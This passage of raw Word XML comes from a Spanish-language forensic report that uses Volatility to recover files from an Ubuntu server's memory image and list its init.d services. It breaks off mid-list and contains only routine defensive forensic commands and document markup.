ptWGy9DbdlUhZUMqlFR+6ThI6We5Hpharup&#10;+65kZX8SaljdKsll1ZUlJ2D1YvJkWBjbH3mrqb5gaKNUEbIEtpT/q1sq7v12x6v/VYeKUaeuFCTV&#10;ha3K0bUIAP4fraI+Tv4wQ6EAAAAASUVORK5CYIJQSwMEFAAGAAgAAAAhACaSNyHgAAAACAEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj0tPwzAQhO9I/AdrkbhR58EjhDhVVQGnqhItEuLmxtskaryOYjdJ&#10;/z3LCY6zs5r5pljOthMjDr51pCBeRCCQKmdaqhV87t/uMhA+aDK6c4QKLuhhWV5fFTo3bqIPHHeh&#10;FhxCPtcKmhD6XEpfNWi1X7geib2jG6wOLIdamkFPHG47mUTRo7S6JW5odI/rBqvT7mwVvE96WqXx&#10;67g5HdeX7/3D9msTo1K3N/PqBUTAOfw9wy8+o0PJTAd3JuNFp4CHBL5GTykItrP75xjEQUGaJBnI&#10;spD/B5Q/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DxrVj4wBAAA4wsAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAA&#10;AAAAAAAhAMJnqsqH8wAAh/MAABQAAAAAAAAAAAAAAAAAlgYAAGRycy9tZWRpYS9pbWFnZTEucG5n&#10;UEsBAi0ACgAAAAAAAAAhAGaVpJAwLgAAMC4AABQAAAAAAAAAAAAAAAAAT/oAAGRycy9tZWRpYS9p&#10;bWFnZTIucG5nUEsBAi0AFAAGAAgAAAAhACaSNyHgAAAACAEAAA8AAAAAAAAAAAAAAAAAsSgBAGRy&#10;cy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQAubPAAxQAAAKUBAAAZAAAAAAAAAAAAAAAAAL4p&#10;AQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAHAAcAvgEAALoqAQAAAA==&#10;">
                <v:group id="_x0000_s1127" style="position:absolute;width:53917;height:13684" coordsize="53923,13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g1tyAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NasJA&#10;EL4XfIdlBG91kyaKpq4i0pYepFAVpLchOybB7GzIrkl8+65Q6HG+/1ltBlOLjlpXWVYQTyMQxLnV&#10;FRcKTsf35wUI55E11pZJwZ0cbNajpxVm2vb8Td3BFyKEsMtQQel9k0np8pIMuqltiAN3sa1BH862&#10;kLrFPoSbWr5E0VwarDg0lNjQrqT8ergZBR899tskfuv218vu/nOcfZ33MSk1GQ/bVxCeBv8v/nN/&#10;6jA/TpdpEqXzBB4/BQDk+hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBlsg1tyAAAAOMA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:shape id="Imagen 59" o:spid="_x0000_s1128" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:30054;height:13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FE0xwAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/disIw&#10;EIXvBd8hjOCdplopthpFBEFwL1btAwzN2BabSWlS7b79RljYy8P5+Tjb/WAa8aLO1ZYVLOYRCOLC&#10;6ppLBfn9NFuDcB5ZY2OZFPyQg/1uPNpipu2br/S6+VKEEXYZKqi8bzMpXVGRQTe3LXHwHrYz6IPs&#10;Sqk7fIdx08hlFCXSYM2BUGFLx4qK5603AbK6JN/X/M59fvySybOlx1L2Sk0nw2EDwtPg/8N/7bNW&#10;kKZpHK/jxQo+l8IdkLtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABYsUTTHAAAA4gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                    <v:imagedata r:id="rId169" o:title="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 60" o:spid="_x0000_s1129" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:30396;top:150;width:23527;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05xwAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NTgIx&#10;EL6b8A7NmHiTVlACK4UQExM5qcjF27gddzfbTjdtZXff3pKQcJzvf9bbwVlxohAbzxoepgoEcelN&#10;w5WG49fr/RJETMgGrWfSMFKE7WZys8bC+J4/6XRIlcghHAvUUKfUFVLGsiaHceo74sz9+uAw5TNU&#10;0gTsc7izcqbUQjpsODfU2NFLTWV7+HMa7H78GaWNx/cw/x5XH6Xq922r9d3tsHsGkWhIV/HF/Wby&#10;fPWo5sun2WIF558yAHLzDwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABhunTnHAAAA4wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                    <v:imagedata r:id="rId170" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1130" type="#_x0000_t202" style="position:absolute;left:30294;top:6997;width:23558;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zI0ygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC/iUrdu1LpsjKGgXobdLrs9mrem2ryUJN3qtzeC4PH9/r/lerSdOJMPrWMFD5MMBHHt&#10;dMuNgsP+5b4AESKyxs4xKfimAOvV9dUSS+0u/EHnKjYihXAoUYGJsS+lDLUhi2HieuLEnZy3GNPp&#10;G6k9XlK47eQ0yxbSYsupwWBPW0P1VzVYBbv8uDN3w+n5fZPP/Nth2C4+m0qp25tx8wQi0hj/xX/u&#10;V53mPxbzaV5kszn8/pQAkKsfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAN7LMjTKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="386928C7" w14:textId="73732633" w:rsidR="00C9479C" w:rsidRPr="00240673" w:rsidRDefault="00C9479C" w:rsidP="00C9479C">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>34</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="89" w:name="_Toc155782601"/>
                        <w:r w:rsidRPr="00704D7C">
                          <w:t>Volcado de datos y cantidad de archivos recuperados.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="89"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aunque no sea un proceso de interés procesos en funcionamiento de interés para el análisis propiamente dicho, ya que considero a procesos como archivos en ejecución por parte del sistema operativo, la sección anterior, recomienda hacer esta </w:t>
      </w:r>
      <w:r w:rsidR="00EC4C11" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acción</w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en este momento, </w:t>
      </w:r>
      <w:r w:rsidR="00EC4C11" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así</w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que procederé a ello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A18761" w14:textId="7D1EBFC9" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_recover_filesystem</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite a los analistas forenses recuperar archivos de una imagen de memoria del sistema. Al ejecutar </w:t>
      </w:r>
      <w:r w:rsidR="00EC4C11">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>el comando,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puedo extraer archivos y directorios que estaban presentes en el sistema de archivos en el momento en que se tomó la imagen de </w:t>
      </w:r>
      <w:r w:rsidR="00373996" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memoria. Esto</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> incluye archivos que pueden haber sido eliminados o no estar inmediatamente visibles en un análisis superficial. La capacidad de recuperar archivos de este modo es crucial en investigaciones forenses, ya que permite a los analistas acceder a evidencia potencial que podría haber sido ocultada, eliminada o manipulada por un usuario o por un software malicioso. Esta herramienta es particularmente útil en casos de análisis de malware, investigaciones de intrusiones y recuperación de datos. En este caso el comando a usar en la consola es </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_recover_filesystem --dump-dir /home/jrodg85/volcado-datos/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, donde con </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>--dump-dir /home/jrodg85/volcado-datos/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vamos a dirigir el volcado de datos a la carpeta que hemos creado en </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C052A" w14:textId="6C7479F1" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como podemos ver, esta es la distribución de las carpetas que se han descargado cuando se ha ejecutado el comando, en vez de verlo de esta manera, considero realizar a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volcado-datos/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> un </w:t>
      </w:r>
      <w:r w:rsidRPr="00443705">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, de modo que podremos ver de manera ordenada. El comando </w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">que se procede </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a ejecutar desde </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volcado-datos/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, será </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo tree ./ &gt; /home/jrodg85/informe-tree.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya que de este modo obtendremos un informe del comando para poder analizarlo paralelamente. Debido a que la salida del comando es de 16390 </w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, se procederá a realizar una referencia dentro al archivo para que pueda ser analizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF55D2" w14:textId="7BF4867D" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se pueden llegar a las siguientes conclusiones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195AD0F" w14:textId="135508F8" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Los servicios que por defecto arrancan el ser servidor, los alojados en </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/etc/init.d/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0977C" w14:textId="781A9121" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acpid</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache2</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache-htcacheclean</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apparmor</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apport</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> atd</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> console-setup.sh</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cron</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cryptdisks</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cryptdisks-early</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dbus</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ebtables</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E15DB8" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grub-common</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hibagent</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hwclock.sh</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> irqbalance</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> iscsid</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
